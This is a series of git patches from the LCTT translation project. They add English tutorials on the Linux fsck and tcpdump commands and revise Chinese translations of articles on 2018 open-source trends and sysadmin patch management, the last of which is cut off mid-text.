[93]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop + + From 2534d0e034741ae8f583075f83c612dd4fd1708e Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 21:47:30 +0800 Subject: [PATCH 0800/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Check=20Linux?= =?UTF-8?q?=20filesystem=20for=20errors:=20FSCK=20command=20with=20example?= =?UTF-8?q?s?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... for errors- FSCK command with examples.md | 137 ++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md diff --git a/sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md b/sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md new file mode 100644 index 0000000000..d20e862c88 --- /dev/null +++ b/sources/tech/20171226 Check Linux filesystem for errors- FSCK command with examples.md @@ -0,0 +1,137 @@ +translating by lujun9972 +Check Linux filesystem for errors: FSCK command with examples +====== +FSCK is a very important Linux/Unix utility, it is used to check & repair the errors in the file system. It is similar to 'chkdsk' utility in Windows operating systems. It is available for Linux, MacOS, FreeBSD operating systems. + +FSCK stands for File System Consistency Check & most of the times, it runs at boot time but can also be started manually by super user, if need arises. + +It can be used with 3 modes of operation, + + **1-** Check for errors & let the user decide what should be done with each error, + + **2-** Check for errors & make repairs automatically, or, + + **3-** Check for errors & display the error but does not perform any repairs. + + **(Recommended Read:[Learn to use TCPDUMP command with examples][1])** + +### Syntax for using FSCK + +We can use the FSCK command manually with the following syntax, + + **$ fsck options drives** + +The options that can be used with fsck command are, + + **-p ** Automatic repair (no questions) + + **-n** Make no changes to the filesystem + + **-y ** Assume "yes" to all questions + + **-c** Check for bad blocks and add them to the badblock list + + **-f ** Force checking even if filesystem is marked clean + + **-v ** Be verbose + + **-b ** superblock Use alternative superblock + + **-B** blocksize Force blocksize when looking for superblock + + **-j ** external_journal Set location of the external journal + + **-l ** bad_blocks_file Add to badblocks list + + **-L ** bad_blocks_file Set badblocks list + +We can use any of the following options, depending on the operation we need to perform. Let's discuss some of the options of fsck command with examples. + +### Fsck command with examples + + **Note:-** Before we discuss any examples, please read this. We should not be using FSCK on mounted drives, as there will be high chances that fsck on mounted drive wll damage the drive permanently. So before performing fsck, we must un-mount the drive with the following command, + + **$ umount drivename** + +For example, + + **$ umount /dev/sdb1** + +You can check the partition number with the following command, + + **$ fdisk -l** + +Also while running the fsck, we might get some error codes. Below mentioned is the list of error codes that we might get along with their meanings, + + **0** - No errors +**1** - Filesystem errors corrected +**2** - System should be rebooted +**4** - Filesystem errors left uncorrected +**8** - Operational error +**16** - Usage or syntax error +**32** - Fsck canceled by user request +**128** - Shared-library error + +Now let's discuss usage of fdisk command with examples, + +### Perform an error check on a single partition + +To perform a file check on a single partition, run the following command from the terminal, + + **$ umount /dev/sdb1** + + **$ fsck /dev/sdb1** + +### Check filesystem for errors & repair them automatically + +Run the fsck command with 'a' option to perform consistency check & to repair them automatically, execute the following command. We can also use 'y' option in place of option 'a'. + + **$ fsck -a /dev/sdb1** + +### Check filesystem for errors but don't repait them + +In case we only need to see the error that are occurring on our file system & dont need to repair them, than we should run fsck with option 'n', + + **$ fsck -n /dev/sdb1** + +### Perform an error check on all partitions + +To perform a filesystem check for all partitions in single go, use fsck with 'A' option, + + **$ fsck -A** + +To disable the root file system check, we will use the option 'R' + + **$ fsck -AR** + +### Check only partition with mentioned filesystem + +In order to run fsck on all the partitiions with mentioned filesystem type, for example 'ext4', use fsck with option 't' followed by filesystem type, + + **$ fsck -t ext4 /dev/sdb1** + +or + + **$ fsck -t -A ext4** + +### Perform consistency check only on unmounted drives + +To make sure that the fsck is performed only on unmounted drives, we will use option 'M' while running fsck, + + **$ fsck -AM** + +This was our tutorial on fsck command with examples. Please feel free to send in your questions or queries to us, using the comment box below. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/linux-filesystem-errors-fsck-command-with-examples/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/learn-use-tcpdump-command-examples/ From 60fcc496d57cc28d253fe4cbbc14bbe078bb0948 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 21:58:35 +0800 Subject: [PATCH 0801/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Learn=20how=20t?= =?UTF-8?q?o=20use=20tcpdump=20command=20with=20examples?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ow to use tcpdump command with examples.md | 136 ++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 sources/tech/20171109 Learn how to use tcpdump command with examples.md diff --git a/sources/tech/20171109 Learn how to use tcpdump command with examples.md b/sources/tech/20171109 Learn how to use tcpdump command with examples.md new file mode 100644 index 0000000000..7df944aacf --- /dev/null +++ b/sources/tech/20171109 Learn how to use tcpdump command with examples.md @@ -0,0 +1,136 @@ +translating by lujun9972 +Learn how to use tcpdump command with examples +====== +Tcpdump command is a famous network packet analysing tool that is used to display TCP\IP & other network packets being transmitted over the network attached to the system on which tcpdump has been installed. Tcpdump uses libpcap library to capture the network packets & is available on almost all Linux/Unix flavors. + +Tcpdump command can read the contents from a network interface or from a previously created packet file or we can also write the packets to a file to be used for later. One must use the tcpdump command as root or as a user with sudo privileges. + +In this tutorial, we are going to discuss the uses of tcpdump command along with some examples, but first let's start with installation of tcpdump on various Linux OS. + + **(Recommended Read:[Monitoring network bandwidth with iftop command][1])** + +### Installation + +By default, tcpdump is available on almost all Linux distributions but if that's not the case for you, install it on your system using the following method. + + **CentOS/RHEL** + +Install tcpdump on CentOS & RHEL using the following command , + + **$ sudo yum install tcpdump** + + **Fedora** + +On Fedora, install tcpdump using the following command, + + **$ dnf install tcpdump** + + **Ubuntu/Debian/Linux Mint** + +On Ubuntu or Debian or Linux Mint, install tcp dumo using the following command, + + **$ apt-get install tcpdump** + +Now that we have install tcpdump on our systems, let's discuss some examples for tcpdump. + +### Examples + + **Get packets from all interfaces** + +To get the network packets from all network interfaces, run the following command, + + **$ tcpdump -i any** + +**Get packets from a single interfaces** + +To get the network packets from a single interface, use + + **$ tcpdump -i eth0** + +**Writing captured packets to file** + +To write all the captured packets to a file, use the '-w' option, + + **$ tcpdump -i eth1 -w packets_file** + +**Reading an old tcpdump file** + +To read an already created, old tcpdump file, use the following command, + + **$ tcpdump -r packets_file** + +**Getting more packets information with readable timestamps** + +To get more information regarding the packets along with readable timestamp, use + + **$ tcpdump -ttttnnvvS** + +**Check packets of whole network** + +To get the packets for whole network, execute the following command from terminal + + **$ tcpdump net 192.168.1.0/24** + +**Check packets based on IP address** + +Get all the packets based on the IP address, whether source or destination or both, using the following command, + + **$ tcpdump host 192.168.1.100** + +To get packets based on source or destination of an IP address, use + + **$ tcpdump src 192.168.1.100** + + **$ tcpdump dst 192.168.1.100** + +**Check packets for a protocol or port number** + +To check all the packets used based on the protocol, run the following command + + **$ tcpdump ssh** + +To get packets for a single port ot for a range of ports, use + + **$ tcpdump port 22** + + **$ tcpdump portrange 22-125** + +We can also use ** 'src'** & **' dst'** options to get packets for ports based on source & destination. + +We can also combine two conditions with AND (and , && ), OR ( or. || ) & EXCEPT (not , ! ). This helps when we have analyze network packets based on the some condtions. + +**Using AND** +We can use 'and' or symbol '&&' to combine two conditions or mote with tcpdump. An example would be, + + **$ tcpdump src 192.168.1.100 && port 22 -w ssh_packets** + +**Using OR** + +OR will check the command agtcpdump -i eth0 src port not 22ainst one the mentioned conditions in the command, like + + **$ tcpdump src 192.168.1.100 or dst 192.168.1.50 && port 22 -w ssh_packets** + + **$ tcpdump port 443 or 80 -w http_packets** + +**Using EXCEPT** + +EXCEPT will be used when we want not fulfill a condition, like + + **$ tcpdump -i eth0 src port not 22** + +This will monitor all the traffic on eth0 but will not capture port 22. + +This was our tutorial on how to install & use tcpdump command to capture the network packets. Please feel free to send in any queries or suggestions using the comment box below. + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/learn-use-tcpdump-command-examples/ + +作者:[Shusain ][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:http://linuxtechlab.com/monitoring-network-bandwidth-iftop-command/ From 7e41758fb7e99f4e0e75bad23940e237f6d0eff1 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 09:00:46 +0800 Subject: [PATCH 0802/1627] PRF:20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @wangy325 翻译的很好!不过以后不要改文件名。 --- ...EN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md | 79 +++++++++---------- 1 file changed, 39 insertions(+), 40 deletions(-) diff --git a/translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md b/translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md index ab5e952bf7..2753f61e11 100644 --- a/translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md +++ b/translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md @@ -1,112 +1,111 @@ 2018 年开源技术 10 大发展趋势 ============================================================ -### 你是否关注过开源技术的发展趋势? +> 你是否关注过开源技术的发展趋势? 这里是 10 个预测。 ![2018 年开源技术的 10 大发展趋势](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018") -图片来源:[Mitch Bennett][10]. [Opensource.com][31] 修改 +*图片来源:[Mitch Bennett][10]. [Opensource.com][31] 修改* -科技一直在发展,诸如OpenStack,PWAs,Rust,R,认知云,人工智能(AI),物联网等一些新技术正在颠覆我们对世界的固有认知。以下是 2018 年最可能成为主流的开源技术纲要。 +技术一直在变革,诸如 OpenStack、增强型网页应用Progressive Web App(PWA)、Rust、R、认知云the cognitive cloud、人工智能(AI),物联网等一些新技术正在颠覆我们对世界的固有认知。以下概述了 2018 年最可能成为主流的开源技术。 -### 1\. OpenStack 认可度持续高涨 +### 1、 OpenStack 认可度持续高涨 [OpenStack][12] 本质上是一个云操作平台(系统),它为管理员提供直观友好的控制面板,以便对大量的计算、存储和网络资源进行配置和监管。 -目前,很多企业运用 OpenStack 平台搭建和管理云计算系统。得益于其灵活的生态系统、透明度和运行速度,OpenStack 越来越流行。相比其他替代方案,OpenStatic 只需更少的花费便能轻松支持任务关键型应用程序。 -但是,复杂的结构以及其对虚拟化、服务器、额外网络资源的严重依赖使得其它一些企业对使用 OpenStack 心存顾虑。另外,想要用好 OpenStack,好的硬件支持和高水平的员工二者缺一不可。 +目前,很多企业运用 OpenStack 平台搭建和管理云计算系统。得益于其灵活的生态系统、透明度和运行速度,OpenStack 越来越流行。相比其他替代方案,OpenStack 只需更少的花费便能轻松支持任务关键型应用程序。 +但是,其复杂的结构以及其对虚拟化、服务器和大量网络资源的严重依赖使得不少企业对使用 OpenStack 心存顾虑。另外,想要用好 OpenStack,好的硬件支持和高水平的员工二者缺一不可。 -OpenStack 基金会一直在致力于完善他们的产品。不管发布与否的一些小的功能创新,都会解决 OpenStack 的潜在问题。随着其结构复杂性降低,OpenStack 将获取更大认可。加之众多大型软件开发和托管公司以及成千上万会员的支持, OpenStack 在云计算时代前途光明。 +OpenStack 基金会一直在致力于完善他们的产品。一些功能创新,无论是已经发布的还是尚处于打造阶段,都将解决许多 OpenStack 潜在的问题。随着其结构复杂性降低,OpenStack 将获取更大认可。加之众多大型的软件开发及托管公司以及成千上万会员的支持, OpenStack 在云计算时代前途光明。 -### 2\. PWA 或将大热 +### 2、 PWA 或将大热 -PWA,即 [增强型网页应用][13],是技术、设计和网络应用程序接口(web APIs)的集合,它能够在移动浏览器上提供类似应用程序的体验 +PWA,即 [增强型网页应用][13]Progressive Web App,是对技术、设计和网络应用程序接口Web API的整合,它能够在移动浏览器上提供类似应用的体验。 -传统的网页有许多与生俱来的缺点。虽然应用程序提供了一个比网页更加个性化、用户参与度更高的体验,但是却要占用大量的系统资源;并且要想使用应用,你还必须提前下载安装。PWA 则扬长避短,它为浏览器、可变引擎搜索框和其他一些操作作出响应,为用户提供应用程序般的体验。PWA 也能像应用程序一样自动更新显示最新的信息,基于网页的 HTTPS 模式又让其更加安全。PWA 运行于标准容器中,无须安装,只要输入 URL 即可。 +传统的网站有许多与生俱来的缺点。虽然应用(app)提供了比网站更加个性化、用户参与度更高的体验,但是却要占用大量的系统资源;并且要想使用应用,你还必须提前下载安装。PWA 则扬长避短,它可用浏览器访问、可被引擎搜索检索,并可响应式适应外在环境,为用户提供应用级体验。PWA 也能像应用一样自我更新,总是显示最新的实时信息,并且像网站一样,以极其安全的 HTTPS 模式递交信息。PWA 运行于标准容器中,无须安装,任何人只要输入 URL 即可访问。 现在的移动用户看重便利性和参与度,PWAs 的特性完美契合这一需求,所以 PWA 成为主流是必然趋势。 -### 3\. Rust 成开发者新宠 +### 3、 Rust 成开发者新宠 -大多数的编程语言都在安全性和控制二者之间折衷,[Rust][14] 是一个例外。Rust 使用广泛的编译时间检查进行 100% 的控制而不影响程序安全性。上一次 [Pwn2Own][15] 竞赛找出了 Firefox C++ 底层实现的许多严重漏洞。如果 Firefox 是用 Rust 编写的,这些漏洞在产品发布之前的编译阶段就会被发现并解决。 +大多数的编程语言都需在安全和控制二者之间折衷,但 [Rust][14] 是一个例外。Rust 使用广泛的编译时检查进行 100% 的控制而不影响程序安全性。上一次 [Pwn2Own][15] 竞赛找出了 Firefox C++ 底层实现的许多严重漏洞。如果 Firefox 是用 Rust 编写的,这些漏洞在产品发布之前的编译阶段就会被发现并解决。 -Rust 独特的内建单元测试方法使开发者们考虑将其作为首选开源语言。它是 C 和 Python 等其他编程语言有效的替代方案,Rust 可以在不丢失程序可读性的情况下写出安全的代码。总之,Rust 前途光明。 +Rust 独特的内建单元测试方式使开发者们考虑将其作为首选的开源语言。它是 C 和 Python 等其他编程语言有效的替代方案,Rust 可以在不损失程序可读性的情况下写出安全的代码。总之,Rust 前途光明。 -### 4\. R 用户群在壮大 +### 4、 R 用户群在壮大 -[R][16] 编程语言,是一个与统计计算和图像呈现相关的 [*GUN* 项目][32]。它提供了大量的统计和图形技术,并且可扩展引导。它是 [S][17] 语言的延续。S 语言早已成为统计方法学的首选工具,R 为数据操作、计算和图形显示提供了开源选择。R 语言的另一个优势是对细节的把控和对细微差别的关注。 +[R][16] 编程语言,是一个与统计计算和图像呈现相关的 [GUN 项目][32]。它提供了大量的统计和图形技术,并且可扩展增强。它是 [S][17] 语言的延续。S 语言早已成为统计方法学的首选工具,R 为数据操作、计算和图形显示提供了开源选择。R 语言的另一个优势是对细节的把控和对细微差别的关注。 和 Rust 一样,R 语言也处于上升期。 -### 5\. 广义的 XaaS +### 5、 广义的 XaaS -XaaS 是 ”一切都是服务“ 的缩写,是通过网络提供的各种线上服务的总称。XaaS 的外延正在扩大,软件服务(SaaS),基础设施服务(IaaS) 和平台服务(PaaS)等观念已深入人心,新兴的基于云的服务如网络服务(NaaS),存储服务(SaaS 或StaaS),监控服务(MaaS)以及通信服务(CaaS)等概念也正在普及。我们正在迈向一个 ”一切都是服务“ 的世界。 +XaaS 是 “一切皆服务anything as a service” 的缩写,是通过网络提供的各种线上服务的总称。XaaS 的外延正在扩大,软件即服务(SaaS)、基础设施即服务(IaaS) 和平台即服务(PaaS)等观念已深入人心,新兴的基于云的服务如网络即服务(NaaS)、存储即服务(SaaS 或 StaaS)、监控即服务(MaaS)以及通信即服务(CaaS)等概念也正在普及。我们正在迈向一个万事万物 “皆为服务” 的世界。 现在,XaaS 的概念已经延伸到实体企业。著名的例子有 Uber 、Lyft 和 Airbnb,前二者利用新科技提供交通服务,后者提供住宿服务。 -高速网络和服务器虚拟化使得强大的计算能力成为可能,这加速了XaaS的发展,2018 年可能是 ”XaaS 年‘’。XaaS 无与伦比的灵活性、可扩展性将推动 XaaS 进一步发展。 +高速网络和服务器虚拟化使得强大的计算能力成为可能,这加速了 XaaS 的发展,2018 年可能是 “XaaS 年”。XaaS 无与伦比的灵活性、可扩展性将推动 XaaS 进一步发展。 -### 6\. 容器技术越来越受欢迎 +### 6、 容器技术越来越受欢迎 -[容器技术][28],是用标准化方法打包代码的技术,它使得代码能够在任意环境中快速地 ”接入和运行“。容器技术使企业削减花费、更快运行程序。尽管容器技术在 IT 基础结构改革方面的潜力已经表现的很明显,事实上,运用好容器技术仍然是一个难题。 +[容器技术][28],是用标准化方法打包代码的技术,它使得代码能够在任意环境中快速地 “接入并运行”。容器技术让企业可以削减经费、降低实施周期。尽管容器技术在 IT 基础结构改革方面的已经初显潜力,但事实上,运用好容器技术仍然比较复杂。 容器技术仍在发展中,技术复杂性随着各方面的进步在下降。最新的技术让容器使用起来像使用智能手机一样简单、直观,更不用说现在的企业需求:速度和灵活性往往能决定业务成败。 -### 7\. 机器学习和人工智能的更广泛应用 +### 7、 机器学习和人工智能的更广泛应用 [机器学习和人工智能][18] 指在没有程序员给出明确的编码指令的情况下,机器具备自主学习并且积累经验自我改进的能力。 随着一些开源技术利用机器学习和人工智能实现尖端服务和应用,这两项技术已经深入人心。 -[Gartner][19] 预测,2018 年机器学习和人工智能的应用会更广。其他一些领域诸如数据准备、集成、算法选择、方法选择、模块制造等随着机器学习的加入将会取得很大进步。 +[Gartner][19] 预测,2018 年机器学习和人工智能的应用会更广。其他一些领域诸如数据准备、集成、算法选择、学习方法选择、模块制造等随着机器学习的加入将会取得很大进步。 全新的智能开源解决方案将改变人们和系统交互的方式,转变由来已久的工作观念。 -* 机器交互,像[自助语音聊天程序][29]这样的对话平台,提供“问与答”的体验——用户提出问题,对话平台作出回应。 -* 无人驾驶和无人机现在已经家喻户晓了,2018年将会更司空见惯。 +* 机器交互,像[聊天机器人][29]这样的对话平台,提供“问与答”的体验——用户提出问题,对话平台作出回应,成为人机之间默认的交互界面。 +* 无人驾驶和无人机现在已经家喻户晓了,2018 年将会更司空见惯。 * 沉浸式体验的应用不再仅仅局限于视频游戏,在真实的生活场景比如设计、培训和可视化过程中都能看到沉浸式体验的身影。 -### 8. 数据区块链将成为主流 +### 8、 区块链将成为主流 -自比特币应用数据区块链技术以来,其已经取得了重大进展,并且已广泛应用在金融系统、保密选举、学历验证、等领域中。未来几年,区块链会在医疗、制造业、供应链物流、政府服务等领域中大展拳脚。 +自比特币应用区块链技术以来,其已经取得了重大进展,并且已广泛应用在金融系统、保密选举、学历验证等领域中。未来几年,区块链会在医疗、制造业、供应链物流、政府服务等领域中大展拳脚。 -数据区块链分布式存储数据信息,这些数据信息依赖于数百万个共享数据库的节点。数据区块不被任意单一所有者控制,并且单个损坏的节点不影响其正常运行,数据区块链的这两个特性让它异常健康、透明、不可破坏。同时也规避了有人从中篡改数据的风险。数据区块链强大的先天优势足够支撑其成为将来主流技术。 +区块链分布式存储数据信息,这些数据信息依赖于数百万个共享数据库的节点。区块链不被任意单一所有者控制,并且单个损坏的节点不影响其正常运行,区块链的这两个特性让它异常健壮、透明、不可破坏。同时也规避了有人从中篡改数据的风险。区块链强大的先天优势足够支撑其成为将来主流技术。 -### 9.认知云粉墨登场 +### 9、 认知云粉墨登场 -认识技术,如前所述的机器学习和人工智能,用于为多行业提供简单化和个性化服务。一个典型例子是金融行业的游戏化应用,其为投资者提供严谨的投资建议,降低投资模块的复杂程度。数字信托平台使得金融机构的身份认证过程较以前精简80%,提升了协议遵守率,降低了诈骗率。 +认识技术,比如前面所述的机器学习和人工智能,用于为多行业提供简单化和个性化服务。一个典型例子是金融行业的游戏化应用,其为投资者提供了严谨的投资建议,降低投资模块的复杂程度。数字信托平台使得金融机构的身份认证过程较以前精简 80%,提升了合规性,降低了诈骗比率。 -认知云技术现在正向云端迁移,借助云,它将更加强大。[IBM Watson][33] 是认知云应用最知名的例子。IBM 的 UIMA 架构是开源的,由 Apache 负责维护。DARPA(美国国防高级研究计划局) 的 DeepDive 项目借鉴 Watson 的机器学习能力,通过不断学习人类行为来增强决断能力。另一个开源平台 [OpenCog][34] ,为开发者和数据科学家开发人工智能应用程序提供支撑。 +认知云技术现在正向云端迁移,借助云,它将更加强大。[IBM Watson][33] 是认知云应用最知名的例子。IBM 的 UIMA 架构是开源的,由 Apache 基金会负责维护。DARPA(美国国防高级研究计划局)的 DeepDive 项目借鉴了 Watson 的机器学习能力,通过不断学习人类行为来增强决策能力。另一个开源平台 [OpenCog][34] ,为开发者和数据科学家开发人工智能应用程序提供支撑。 -考虑到实现先进的、个性化的用户体验风险较高,这些认知云平台决定来年时机成熟,再粉墨登场。 +考虑到实现先进的、个性化的用户体验风险较高,这些认知云平台来年时机成熟时才会粉墨登场。 -### 10.物联网智联万物 +### 10、 物联网智联万物 -物联网(IoT)的核心在于建立小到嵌入式传感器、大至计算机设备的相互连接,让其(“事物”)相互之间可以收发数据。毫无疑问,物联网将会是科技届的下一个 “搅局者”,但物联网本身处于一个不断变化的状态。 +物联网(IoT)的核心在于建立小到嵌入式传感器、大至计算机设备的相互连接,让其(“物”)相互之间可以收发数据。毫无疑问,物联网将会是科技界的下一个 “搅局者”,但物联网本身处于一个不断变化的状态。 -物联网最广为人知的产品就是 IBM 和三星合力打造的去中心化P2P自动遥测系统([ADEPT][20])。它运用和区块链类似的技术来构建一个去中心化的物联网。没有中央控制设备,”事物“ 之间通过自主交流来进行升级软件、处理bug、管理电源等等一系列操作。 +物联网最广为人知的产品就是 IBM 和三星合力打造的去中心化 P2P 自动遥测系统([ADEPT][20])。它运用和区块链类似的技术来构建一个去中心化的物联网。没有中央控制设备,“物” 之间通过自主交流来进行升级软件、处理 bug、管理电源等等一系列操作。 ### 开源推动技术创新 -[数字中断][30]是当今以科技为中心的时代的常态。在技术领域,开放源代码正在逐渐普及,其在2018将年成为大多数科技创新的驱动力。 +[数字化颠覆][30]是当今以科技为中心的时代的常态。在技术领域,开放源代码正在逐渐普及,其在 2018 将年成为大多数技术创新的驱动力。 此榜单对开源技术趋势的预测有遗漏?在评论区告诉我们吧! -*文章标签:* [ `商业` ][25] [ `年鉴` ][26] [ `2017开源年鉴` ][27] ### 关于作者 ![Sreejith Omanakuttan](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brain_2.jpg?itok=9PkPTyrV) -[**Sreejith Omanakuttan**][21] - 自 2000 年开始编程,2007年开始从事专业工作。目前在 [Fingent][6] 领导开源团队,工作内容涵盖不同的技术层面,从“无聊的工作”(?)到前沿科技。有一套 “构建—修复—推倒重来” 工作哲学。在领英上关注我:https://www.linkedin.com/in/futuregeek/ +[**Sreejith Omanakuttan**][21] - 自 2000 年开始编程,2007年开始从事专业工作。目前在 [Fingent][6] 领导开源团队,工作内容涵盖不同的技术层面,从“无聊的工作”(?)到前沿科技。有一套 “构建—修复—推倒重来” 工作哲学。在领英上关注我: https://www.linkedin.com/in/futuregeek/ -------------------------------------------------------------------------------- -原文链接: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 +via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 -作者:[Sreejith ][a] +作者:[Sreejith Omanakuttan][a] 译者:[wangy325](https://github.com/wangy25) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From a20f57a450306e5097c1df40aaecbde9ec179e88 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 09:01:15 +0800 Subject: [PATCH 0803/1627] PUB:20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018 @wangy325 https://linux.cn/article-9178-1.html --- .../20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md => published/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018.md (100%) diff --git a/translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md b/published/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018.md similarity index 100% rename from translated/tech/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_CN.md rename to published/20171129 10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018.md From 5e124aac7038a2f114d8d6856b718badeb3463c1 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 10:47:40 +0800 Subject: [PATCH 0804/1627] PRF&PUB:20171114 Sysadmin 101 Patch Management.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @haoqixu 翻译的很好!https://linux.cn/article-9179-1.html --- .../20171114 Sysadmin 101 Patch Management.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) rename {translated/tech => published}/20171114 Sysadmin 101 Patch Management.md (69%) diff --git a/translated/tech/20171114 Sysadmin 101 Patch Management.md b/published/20171114 Sysadmin 101 Patch Management.md similarity index 69% rename from translated/tech/20171114 Sysadmin 101 Patch Management.md rename to published/20171114 Sysadmin 101 Patch Management.md index 4a7a223ccf..895c0d0489 100644 --- a/translated/tech/20171114 Sysadmin 101 Patch Management.md +++ b/published/20171114 Sysadmin 101 Patch Management.md @@ -1,15 +1,15 @@ 系统管理 101:补丁管理 ============================================================ -就在之前几篇文章,我开始了“系统管理 101”系列文章,用来记录现今许多初级系统管理员,DevOps 工程师或者“全栈”开发者可能不曾接触过的一些系统管理方面的基本知识。按照我原本的设想,该系列文章已经是完结了的。然而后来 WannaCry 恶意软件出现并在补丁管理不善的 Windows 主机网络间爆发。我能想象到那些仍然深陷 2000 年代 Linux 与 Windows 争论的读者听到这个消息可能已经面露优越的微笑。 +就在之前几篇文章,我开始了“系统管理 101”系列文章,用来记录现今许多初级系统管理员、DevOps 工程师或者“全栈”开发者可能不曾接触过的一些系统管理方面的基本知识。按照我原本的设想,该系列文章已经是完结了的。然而后来 WannaCry 恶意软件出现,并在补丁管理不善的 Windows 主机网络间爆发。我能想象到那些仍然深陷 2000 年代 Linux 与 Windows 争论的读者听到这个消息可能已经面露优越的微笑。 -我之所以这么快就决定再次继续“系统管理 101”文章系列,是因为我意识到在补丁管理方面一些 Linux 系统管理员和 Windows 系统管理员没有差别。实话说,在一些方面甚至做的更差(特别是以运行时间为豪)。所以,这篇文章会涉及 Linux 下补丁管理的基础概念,包括良好的补丁管理该是怎样的,你可能会用到的一些相关工具,以及整个补丁安装过程是如何进行的。 +我之所以这么快就决定再次继续“系统管理 101”文章系列,是因为我意识到在补丁管理方面一些 Linux 系统管理员和 Windows 系统管理员没有差别。实话说,在一些方面甚至做的更差(特别是以持续运行时间为自豪)。所以,这篇文章会涉及 Linux 下补丁管理的基础概念,包括良好的补丁管理该是怎样的,你可能会用到的一些相关工具,以及整个补丁安装过程是如何进行的。 ### 什么是补丁管理? 我所说的补丁管理,是指你部署用于升级服务器上软件的系统,不仅仅是把软件更新到最新最好的前沿版本。即使是像 Debian 这样为了“稳定性”持续保持某一特定版本软件的保守派发行版,也会时常发布升级补丁用于修补错误和安全漏洞。 -当然,因为开发者对最新最好版本的需求,你需要派生软件源码并做出修改,或者因为你喜欢给自己额外的工作量,你的组织可能会决定自己维护特定软件的版本,这时你就会遇到问题。理想情况下,你应该已经配置好你的系统,让它在自动构建和打包定制版本软件时使用其它软件所用的同一套持续集成系统。然而,许多系统管理员仍旧在自己的本地主机上按照维基上的文档(但愿是最新的文档)使用过时的方法打包软件。不论使用哪种方法,你都需要明确你所使用的版本有没有安全缺陷,如果有,那必须确保新补丁安装到你定制版本的软件上了。 +当然,如果你的组织决定自己维护特定软件的版本,要么是因为开发者有最新最好版本的需求,需要派生软件源码并做出修改,要么是因为你喜欢给自己额外的工作量,这时你就会遇到问题。理想情况下,你应该已经配置好你的系统,让它在自动构建和打包定制版本软件时使用其它软件所用的同一套持续集成系统。然而,许多系统管理员仍旧在自己的本地主机上按照维基上的文档(但愿是最新的文档)使用过时的方法打包软件。不论使用哪种方法,你都需要明确你所使用的版本有没有安全缺陷,如果有,那必须确保新补丁安装到你定制版本的软件上了。 ### 良好的补丁管理是怎样的 @@ -17,17 +17,17 @@ 一些组织仍在使用手动方式管理补丁。在这种方式下,当出现一个安全补丁,系统管理员就要凭借记忆,登录到各个服务器上进行检查。在确定了哪些服务器需要升级后,再使用服务器内建的包管理工具从发行版仓库升级这些软件。最后以相同的方式升级剩余的所有服务器。 -手动管理补丁的方式存在很多问题。首先,这么做会使补丁安装成为一个苦力活,安装补丁需要越多人力成本,系统管理员就越可能推迟甚至完全忽略它。其次,手动管理方式依赖系统管理员凭借记忆去跟踪他或她所负责的服务器的升级情况。这非常容易导致有些服务器被遗漏而未能及时升级。 